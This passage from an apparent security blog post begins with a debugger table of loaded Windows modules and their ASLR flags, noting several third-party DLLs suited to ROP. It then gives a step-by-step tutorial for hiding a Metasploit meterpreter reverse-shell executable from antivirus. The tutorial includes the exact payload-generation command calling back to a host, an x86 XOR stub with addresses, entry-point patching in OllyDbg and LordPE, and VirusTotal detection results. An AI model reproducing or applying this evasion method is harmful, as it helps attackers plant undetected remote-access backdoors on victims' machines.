0BADF00D      yes   | 0x73E50000 | 0x73E60000 | 0x00010000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - Syncreg.dll : C:\Windows\system32\Syncreg.dll
0BADF00D      yes   | 0x6C0B0000 | 0x6C328000 | 0x00278000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - gameux.dll : C:\Windows\System32\gameux.dll
0BADF00D      yes   | 0x759F0000 | 0x75ABC000 | 0x000CC000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - MSCTF.dll : C:\Windows\system32\MSCTF.dll
0BADF00D      yes   | 0x65D40000 | 0x65EEE000 | 0x001AE000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - pnidui.dll : C:\Windows\System32\pnidui.dll
0BADF00D      yes   | 0x73270000 | 0x73280000 | 0x00010000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - nlaapi.dll : C:\Windows\System32\nlaapi.dll
0BADF00D      yes   | 0x74F40000 | 0x74F4E000 | 0x0000E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - RpcRtRemote.dll : C:\Windows\system32\RpcRtRemote.dll
0BADF00D      yes   | 0x753C0000 | 0x7540E000 | 0x0004E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - GDI32.dll : C:\Windows\system32\GDI32.dll
0BADF00D      yes   | 0x74750000 | 0x7475E000 | 0x0000E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - DEVRTL.dll : C:\Windows\system32\DEVRTL.dll
0BADF00D      yes   | 0x721B0000 | 0x721D5000 | 0x00025000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - cscobj.dll : C:\Windows\System32\cscobj.dll
0BADF00D      yes   | 0x71F40000 | 0x71F8D000 | 0x0004D000 |   yes   |  yes  |    yes   |   yes  | 7.00.7600.16385 - srchadmin.dll : C:\Windows\System32\srchadmin.dll
0BADF00D      yes   | 0x6D7E0000 | 0x6D82F000 | 0x0004F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - hgcpl.dll : C:\Windows\System32\hgcpl.dll
0BADF00D      yes   | 0x6AF20000 | 0x6B160000 | 0x00240000 |   yes   |  yes  |    yes   |   yes  | 5.0.7600.16385 - msi.dll : C:\Windows\system32\msi.dll
0BADF00D      yes   | 0x75060000 | 0x7517C000 | 0x0011C000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - CRYPT32.dll : C:\Windows\system32\CRYPT32.dll
0BADF00D      yes   | 0x6E6E0000 | 0x6E84F000 | 0x0016F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - EXPLORERFRAME.dll : C:\Windows\system32\EXPLORERFRAME.dll
0BADF00D      yes   | 0x71CD0000 | 0x71D34000 | 0x00064000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - prnfldr.dll : C:\Windows\system32\prnfldr.dll
0BADF00D      yes   | 0x68BD0000 | 0x6964F000 | 0x00A7F000 |   yes   |  yes  |    yes   |   yes  | 8.00.7600.16385 - ieframe.dll : C:\Windows\System32\ieframe.dll
0BADF00D      yes   | 0x71A30000 | 0x71A3C000 | 0x0000C000 |   yes   |  yes  |    yes   |   yes  | 7.00.7600.16385 - mssprxy.dll : C:\Windows\system32\mssprxy.dll
0BADF00D      yes   | 0x74340000 | 0x7434D000 | 0x0000D000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WTSAPI32.dll : C:\Windows\system32\WTSAPI32.dll
0BADF00D      yes   | 0x6E240000 | 0x6E2CE000 | 0x0008E000 |   yes   |  yes  |    yes   |   yes  | 9.00.30729.4974 - MSVCP90.dll : C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4974_none_50940634bcb759cb\MSVCP90.dll
0BADF00D      yes   | 0x72480000 | 0x724A2000 | 0x00022000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - EhStorAPI.dll : C:\Windows\system32\EhStorAPI.dll
0BADF00D      yes   | 0x6C380000 | 0x6C3CE000 | 0x0004E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - actxprxy.dll : C:\Windows\system32\actxprxy.dll
0BADF00D      yes   | 0x723A0000 | 0x723F8000 | 0x00058000 |   yes   |  yes  |    yes   |   NO   | 6.1.7600.16385 - tiptsf.dll : C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
0BADF00D      yes   | 0x74570000 | 0x74587000 | 0x00017000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - USERENV.dll : C:\Windows\system32\USERENV.dll
0BADF00D      yes   | 0x749D0000 | 0x749E6000 | 0x00016000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - CRYPTSP.dll : C:\Windows\system32\CRYPTSP.dll
0BADF00D      yes   | 0x6FA40000 | 0x6FA56000 | 0x00016000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - Wlanapi.dll : C:\Windows\system32\Wlanapi.dll
0BADF00D      yes   | 0x6BF40000 | 0x6BF7A000 | 0x0003A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - FXSAPI.dll : C:\Windows\system32\FXSAPI.dll
0BADF00D      NO    | 0x6EE60000 | 0x6EE8F000 | 0x0002F000 |   yes   |  NO   |    NO    |   NO   | 1.3.9 - libaprutil_tsvn.dll : C:\Program Files\TortoiseSVN\bin\libaprutil_tsvn.dll
0BADF00D      yes   | 0x71E00000 | 0x71E08000 | 0x00008000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - npmproxy.dll : C:\Windows\System32\npmproxy.dll
0BADF00D      yes   | 0x73990000 | 0x739BF000 | 0x0002F000 |   yes   |  yes  |    yes   |   yes  | 1.3.1000.0 - XmlLite.dll : C:\Windows\System32\XmlLite.dll
0BADF00D      yes   | 0x74E50000 | 0x74E9B000 | 0x0004B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - apphelp.dll : C:\Windows\system32\apphelp.dll
0BADF00D      yes   | 0x6C3E0000 | 0x6C44A000 | 0x0006A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - cscui.dll : C:\Windows\System32\cscui.dll
0BADF00D      yes   | 0x73760000 | 0x73769000 | 0x00009000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - netutils.dll : C:\Windows\system32\netutils.dll
0BADF00D      yes   | 0x71EC0000 | 0x71EE9000 | 0x00029000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - syncui.dll : C:\Windows\system32\syncui.dll
0BADF00D      yes   | 0x66EA0000 | 0x66F13000 | 0x00073000 |   yes   |  yes  |    yes   |   NO   | 1.0.2498.0 - shellext.dll : c:\PROGRA~1\MIF707~1\shellext.dll
0BADF00D      yes   | 0x73A70000 | 0x73A9F000 | 0x0002F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - DUser.dll : C:\Windows\system32\DUser.dll
0BADF00D      yes   | 0x75250000 | 0x75256000 | 0x00006000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - NSI.dll : C:\Windows\system32\NSI.dll
0BADF00D      yes   | 0x6BF80000 | 0x6BFAB000 | 0x0002B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - provsvc.dll : C:\Windows\System32\provsvc.dll
0BADF00D      yes   | 0x76BB0000 | 0x76BF5000 | 0x00045000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WLDAP32.dll : C:\Windows\system32\WLDAP32.dll
0BADF00D      yes   | 0x6C450000 | 0x6CCB4000 | 0x00864000 |   yes   |  yes  |    yes   |   NO   | 14.0.4761.1000 - GrooveIntlResource.dll : C:\PROGRA~1\MICROS~3\Office14\1033\GrooveIntlResource.dll
0BADF00D      yes   | 0x751E0000 | 0x7522A000 | 0x0004A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - KERNELBASE.dll : C:\Windows\system32\KERNELBASE.dll
0BADF00D      yes   | 0x74EB0000 | 0x74F0F000 | 0x0005F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SXS.DLL : C:\Windows\system32\SXS.DLL
0BADF00D      yes   | 0x6CCC0000 | 0x6D0CB000 | 0x0040B000 |   yes   |  yes  |    yes   |   NO   | 14.0.4761.1000 - GROOVEEX.DLL : C:\PROGRA~1\MICROS~3\Office14\GROOVEEX.DLL
0BADF00D      yes   | 0x71FF0000 | 0x72002000 | 0x00012000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wercplsupport.dll : C:\Windows\System32\wercplsupport.dll
0BADF00D      yes   | 0x70FA0000 | 0x70FA6000 | 0x00006000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wlanutil.dll : C:\Windows\system32\wlanutil.dll
0BADF00D      yes   | 0x72D90000 | 0x72D9D000 | 0x0000D000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - dhcpcsvc6.DLL : C:\Windows\system32\dhcpcsvc6.DLL
0BADF00D      yes   | 0x6BAD0000 | 0x6BB59000 | 0x00089000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - PortableDeviceApi.dll : C:\Windows\system32\PortableDeviceApi.dll
0BADF00D      yes   | 0x72DD0000 | 0x72F27000 | 0x00157000 |   yes   |  yes  |    yes   |   yes  | 6.30.7600.16385 - msxml6.dll : C:\Windows\System32\msxml6.dll
0BADF00D      yes   | 0x74410000 | 0x74419000 | 0x00009000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - VERSION.dll : C:\Windows\system32\VERSION.dll
0BADF00D      yes   | 0x76F60000 | 0x77000000 | 0x000A0000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - ADVAPI32.dll : C:\Windows\system32\ADVAPI32.dll
0BADF00D      yes   | 0x75B80000 | 0x75D1D000 | 0x0019D000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SETUPAPI.dll : C:\Windows\system32\SETUPAPI.dll
0BADF00D      yes   | 0x759B0000 | 0x759E5000 | 0x00035000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WS2_32.dll : C:\Windows\system32\WS2_32.dll
0BADF00D      yes   | 0x73B60000 | 0x73CF0000 | 0x00190000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - gdiplus.dll : C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
0BADF00D      yes   | 0x69A80000 | 0x69B30000 | 0x000B0000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - bthprops.cpl : C:\Windows\System32\bthprops.cpl
0BADF00D      NO    | 0x6EEC0000 | 0x6EEE2000 | 0x00022000 |   yes   |  NO   |    NO    |   NO   | 1.3.8 - libapr_tsvn.dll : C:\Program Files\TortoiseSVN\bin\libapr_tsvn.dll
0BADF00D      yes   | 0x74DA0000 | 0x74DB9000 | 0x00019000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - srvcli.dll : C:\Windows\system32\srvcli.dll
0BADF00D      yes   | 0x71F90000 | 0x71FBD000 | 0x0002D000 |   yes   |  yes  |    yes   |   NO   | 3.91.2 - rarext.dll : C:\Program Files\WinRAR\rarext.dll
0BADF00D      yes   | 0x73690000 | 0x736C6000 | 0x00036000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - AUDIOSES.DLL : C:\Windows\system32\AUDIOSES.DLL
0BADF00D      yes   | 0x73AA0000 | 0x73B52000 | 0x000B2000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - DUI70.dll : C:\Windows\system32\DUI70.dll
0BADF00D      yes   | 0x6B550000 | 0x6B6E8000 | 0x00198000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - NetworkExplorer.dll : C:\Windows\system32\NetworkExplorer.dll
0BADF00D      yes   | 0x020A0000 | 0x0216A000 | 0x000CA000 |   yes   |  NO   |    NO    |   NO   | 1.6.11.20210 - TortoiseSVN.dll : C:\Program Files\TortoiseSVN\bin\TortoiseSVN.dll
0BADF00D      yes   | 0x734B0000 | 0x734D1000 | 0x00021000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - ntmarta.dll : C:\Windows\system32\ntmarta.dll
0BADF00D      yes   | 0x04320000 | 0x04334000 | 0x00014000 |   NO    |  NO   |    NO    |   NO   | 4.65 - 7-zip.dll : C:\Program Files\7-Zip\7-zip.dll
0BADF00D      yes   | 0x75DB0000 | 0x75E5C000 | 0x000AC000 |   yes   |  yes  |    yes   |   yes  | 7.0.7600.16385 - msvcrt.dll : C:\Windows\system32\msvcrt.dll
0BADF00D      yes   | 0x73E60000 | 0x73E66000 | 0x00006000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - IconCodecService.dll : C:\Windows\system32\IconCodecService.dll
0BADF00D      yes   | 0x6AC60000 | 0x6AD1A000 | 0x000BA000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - Actioncenter.dll : C:\Windows\System32\Actioncenter.dll
0BADF00D      yes   | 0x75E60000 | 0x75EFD000 | 0x0009D000 |   yes   |  yes  |    yes   |   yes  | 1.0626.7600.16385 - USP10.dll : C:\Windows\system32\USP10.dll
0BADF00D      yes   | 0x74E10000 | 0x74E18000 | 0x00008000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - Secur32.dll : C:\Windows\system32\Secur32.dll
0BADF00D      yes   | 0x75230000 | 0x75242000 | 0x00012000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - DEVOBJ.dll : C:\Windows\system32\DEVOBJ.dll
0BADF00D      yes   | 0x6E540000 | 0x6E591000 | 0x00051000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - WINSPOOL.DRV : C:\Windows\system32\WINSPOOL.DRV
0BADF00D      yes   | 0x71AA0000 | 0x71AE8000 | 0x00048000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wwanapi.dll : C:\Windows\system32\wwanapi.dll
0BADF00D      yes   | 0x6AD20000 | 0x6AE3A000 | 0x0011A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wscui.cpl : C:\Windows\System32\wscui.cpl
0BADF00D      yes   | 0x74770000 | 0x747AB000 | 0x0003B000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - rsaenh.dll : C:\Windows\system32\rsaenh.dll
0BADF00D      yes   | 0x72510000 | 0x72775000 | 0x00265000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - netshell.dll : C:\Windows\System32\netshell.dll
0BADF00D      yes   | 0x73700000 | 0x7370E000 | 0x0000E000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - AltTab.dll : C:\Windows\System32\AltTab.dll
0BADF00D      yes   | 0x75700000 | 0x7578F000 | 0x0008F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16567 - OLEAUT32.dll : C:\Windows\system32\OLEAUT32.dll
0BADF00D      yes   | 0x042D0000 | 0x042E7000 | 0x00017000 |   NO    |  NO   |    NO    |   NO   | 0.1 - NppShell_01.dll : C:\Program Files\Notepad++\NppShell_01.dll
0BADF00D      yes   | 0x75570000 | 0x75611000 | 0x000A1000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - RPCRT4.dll : C:\Windows\system32\RPCRT4.dll
0BADF00D      yes   | 0x72FC0000 | 0x72FD4000 | 0x00014000 |   yes   |  yes  |    yes   |   yes  | 3.05.2284 - ATL.DLL : C:\Windows\system32\ATL.DLL
0BADF00D      yes   | 0x73750000 | 0x7375F000 | 0x0000F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - wkscli.dll : C:\Windows\system32\wkscli.dll
0BADF00D      yes   | 0x6E2F0000 | 0x6E34A000 | 0x0005A000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - netprofm.dll : C:\Windows\System32\netprofm.dll
0BADF00D      yes   | 0x73530000 | 0x73568000 | 0x00038000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SndVolSSO.DLL : C:\Windows\system32\SndVolSSO.DLL
0BADF00D      yes   | 0x72380000 | 0x72397000 | 0x00017000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - QUtil.dll : C:\Windows\System32\QUtil.dll
0BADF00D      yes   | 0x74110000 | 0x742C7000 | 0x001B7000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - authui.dll : C:\Windows\system32\authui.dll
0BADF00D      yes   | 0x73E30000 | 0x73E42000 | 0x00012000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - SAMLIB.dll : C:\Windows\system32\SAMLIB.dll
0BADF00D      yes   | 0x6AE40000 | 0x6AEAF000 | 0x0006F000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - ntshrui.dll : C:\Windows\system32\ntshrui.dll
0BADF00D      yes   | 0x76F50000 | 0x76F53000 | 0x00003000 |   yes   |  yes  |    yes   |   yes  | 6.1.7600.16385 - Normaliz.dll : C:\Windows\system32\Normaliz.dll
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------

Interesting also, i didn't see it before, tortoise svn extensions, 7zip and notepad++ are with no aslr enabled, rop anyone ? :)

Saturday, January 15, 2011

meterpreter xor for further av bypass

Still on holidays here, and in between sake, beer and shochu i found some time to read and check some things that i wanted to do for some time now. One of that was how to implement a simple binary xor in an .exe file especially for meterpreter. Meterpreter is great tool but is being detected from antivirus engines and that makes it difficult to use it as a standard payload. 

Simple way to create one meterpreter binary that will connect back on ip 192.168.11.7:

C:\framework\msf3>ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.11.7 R | ruby msfencode -t exe -o meter_rever_tcp_192.exe -e x86/shikata_ga_nai
-c 2
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)

C:\framework\msf3>


Virustotal result on the binary:
Result:
15/ 37 (40.5%) HASH
0f5298c9572ed0db233b2632aa6068a7

With the following av engines detecting the binary:

Antivirus    Version    Last Update    Result
AhnLab-V3    2011.01.15.00    2011.01.14    Trojan/Win32.Shell
AntiVir        7.11.1.144    2011.01.14    TR/Crypt.EPACK.Gen2
BitDefender    7.2        2011.01.15    Backdoor.Shell.AC
Command        5.2.11.5    2011.01.14    W32/Swrort.A.gen!Eldorado
eTrust-Vet    36.1.8100    2011.01.14    Win32/Swrort.A!generic
F-Prot        4.6.2.117    2011.01.14    W32/Swrort.A.gen!Eldorado    -
GData        21        2011.01.15    Backdoor.Shell.AC
K7AntiVirus    9.75.3548    2011.01.14    Riskware
Microsoft    1.6402        2011.01.14    Trojan:Win32/Swrort.A
NOD32        5788        2011.01.14    a variant of Win32/Rozena.AA
nProtect    2011-01-14.01    2011.01.14    Backdoor.Shell.AC
Panda        10.0.2.7    2011.01.14    Suspicious file
Sophos        4.61.0    2011.01.14    Mal/Swrort-C
SUPERAntiSpyware    4.40.0.1006    2011.01.15    Trojan.Backdoor-PoisonIvy
VirusBuster        13.6.147.0    2011.01.14    Trojan.Rosena.Gen.1
 
 Manual packing of the binary can be done with many ways, the simplest way should be to XOR the data of the binary file. The process is easy you just have to do it once and see it working, from there someone can change the xor function to different more complicated methods in order to achieve better results.

Two tools will be used for the process, one is ollydbg ( http://www.ollydbg.de/ ) and the other lordpe ( http://www.woodmann.com/collaborative/tools/index.php/LordPE ).

Starting the process, we fire up ollydbg and load our binary file, 




Some things to observe here, the OEP, original entry point of the executable module, is at 00406D42. Also checking near the end of the file we are looking to find a place for the new instructions. We are actually looking for a series of  DB 00, at least 10 lines will do the work, if you don't have the space you can always add it using a hex editor.

For the binary file that I' m using a place around 0040BF60 seems nice to place the extra code. The instructions will be, 

mov ecx, "address of our code" - "original entry point"
mov eax, "original entry point"
xor byte [eax], 0A <- here the 0A acts as an encryption key and can be anything that you like
inc eax
dec ecx
jnz "our xor address"
push "original entry point"
retn 

For the binary file that i'm working with instructions are exactly like this:
mov ecx, 521E
mov eax, 00406D42
xor byte [eax], 0A
inc eax
dec ecx
jnz 0040bf6a
push 00406D42
retn





In order to save the modifications, right click, select copy to executable, all modifications


And again choose copy all in the next dialog box. Finally right click in the new window and choose save file.

Input a new filename and we are done for the moment with ollydbg. The next step is to instruct our file to execute our code before anything else. In order to achieve this we need to change the OEP ( original entry point ) to the first address of our instruction set ( for my file the address is 0040BF60).  

LordPE will help us to make this change. All we actually need to do is to calculate the new OEP based on the Image Base and the new entry point. Loading LordPE we choose Pe Editor and we select our new created file.

Originally we have the entry point at 6D42 with our Base Image at 40000, ( OEP loading the file at ollydbg was at 00406D42 )

We need the OEP to be placed at 0040BF60, so new entry point - base image ( 0040BF60 - 0040000 = BF60 )
After changing the EntryPoint we click Save, Ok and we close LordPE.

Back at ollydbg we load the new file, and we can see that the program now is starting at our first instruction.
We need to place now a breakpoint at retn instruction,

By doing that we are telling the debugger that when the program is going to be executed, the execution will stop at the retn function. We are doing this because all we need is for our xor function to start from the top of the actual code until the start of our code and xor every bit of data with the selected key, we don't want to run the program actually. After placing the breakpoint we hit run (or press F9) once
If we take a look at the code above we will see now that it's changed. Now we need to select the modified code and save it as a new file. So selection will start from our new OEP (0040BF60), until the first original OEP (00406D42) of the file.

Right click, select copy to executable, selection and again right click on the new window and save file with a new name.

Finally we have our new XORed file.

Using this simple technique only 2 antivirus engines were bypassed and no longer are detecting meterpreter as virus, the av engines that no longer recognize the binary file are VirusBuster and eTrust-Vet.

More results will follow with different methods of binary encryption/packing. A final for this test, the ollydbg may log an access violation during the XOR process, this is due to the fact that many times .text section of the PE file is market as executable and readable only. We need to change the flags on the section to writable as well. To achieve that loading the file in LordPE, from PE editor, sections, right click on the .text section, flags ... make sure the writable option is set.